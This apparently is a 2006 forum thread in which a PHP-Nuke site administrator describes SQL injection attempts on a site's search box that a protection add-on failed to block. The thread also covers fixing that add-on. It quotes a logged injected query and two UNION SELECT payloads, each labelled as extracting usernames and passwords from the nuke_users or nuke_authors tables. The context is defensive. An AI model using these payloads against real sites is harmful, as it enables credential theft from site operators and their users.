j_felosi
Regular
Joined: Oct 17, 2005
Posts: 51
|
Posted:
Fri Jan 13, 2006 1:05 am |
|
UNI0N SELECTselect s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, a.url, s.comments, s.topic from nuke_stories s, nuke_authors a where s.aid=a.aid AND (s.title LIKE '%s%') UNI0N SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*%' OR s.hometext LIKE '%s%') UNI0N SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*%' OR s.bodytext LIKE '%s%') UNI0N SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*%' OR s.notes LIKE '%s%') UNI0N SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*%') ORDER BY s.time DESC LIMIT 0,10
I been getting hit with that all night and other old union exploits and the sentinel is not banning, should I go back to the pl2? |
|
|
j_felosi
|
Posted:
Fri Jan 13, 2006 2:48 am |
|
Well They turned some stuff back on and I optimized the db and it started firing on them again. The strangest thing but I belive it was something I failed to upload or upload got corrupted. Anyway the pl3 is up and in action but it doesnt fire on the new exploits people are entering directly into search box, well at least not for me. These,
Code:
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* -> users passwords and logins
Code:
s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/* -> nuke_authors passwords and logins
The site is not vuln anyway but you know, could just be my site though because I had tested this on my friends regular nuke site and it banned for union. I entered union into my string blockers and it does fine.
Sorry for freaking yet again. Everything seems fine now. |
|
|